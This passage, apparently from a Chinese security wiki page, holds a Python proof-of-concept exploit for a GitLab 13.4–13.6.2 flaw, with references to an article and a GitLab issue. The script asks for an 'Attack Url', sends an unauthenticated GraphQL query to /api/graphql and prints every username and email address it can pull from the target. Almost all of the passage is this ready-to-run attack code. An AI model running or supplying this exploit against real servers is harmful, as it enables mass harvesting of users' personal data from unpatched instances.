print('+ \033[34mVersion: GitLab 13.4 - 13.6.2 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "/api/graphql"<br />
user_number = 0<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
"Content-Type": "application/json",<br />
}<br />
try:<br />
data = """<br />
{"query":"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }","variables":null,"operationName":null}<br />
"""<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.post(url=vuln_url, headers=headers, data=data ,verify=False, timeout=5)<br />
if "email" in response.text and "username" in response.text and "@" in response.text and response.status_code == 200:<br />
print('\033[32m[o] 目标{}存在漏洞, 泄露用户邮箱数据....... \033[0m'.format(target_url))<br />
for i in range(0,999):<br />
try:<br />
username = json.loads(response.text)["data"]["users"]["edges"][i]["node"]["username"]<br />
email = json.loads(response.text)["data"]["users"]["edges"][i]["node"]["email"]<br />
user_number = user_number + 1<br />
print('\033[34m[o] 用户名:{} 邮箱:{} \033[0m'.format(username, email))<br />
except:<br />
print("\033[32m[o] 共泄露{}名用户邮箱账号 \033[0m".format(user_number))<br />
sys.exit(0)<br />
else:<br />
print("\033[31m[x] 不存在漏洞 \033[0m")<br />
sys.exit(0)<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
</pre><br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
==參考==<br />
</div><br />
https://mp.weixin.qq.com/s/3cT8d9I7qru2tsURqUDusw<br />
<br />
https://gitlab.com/gitlab-org/gitlab/-/issues/244275</div>
L0snight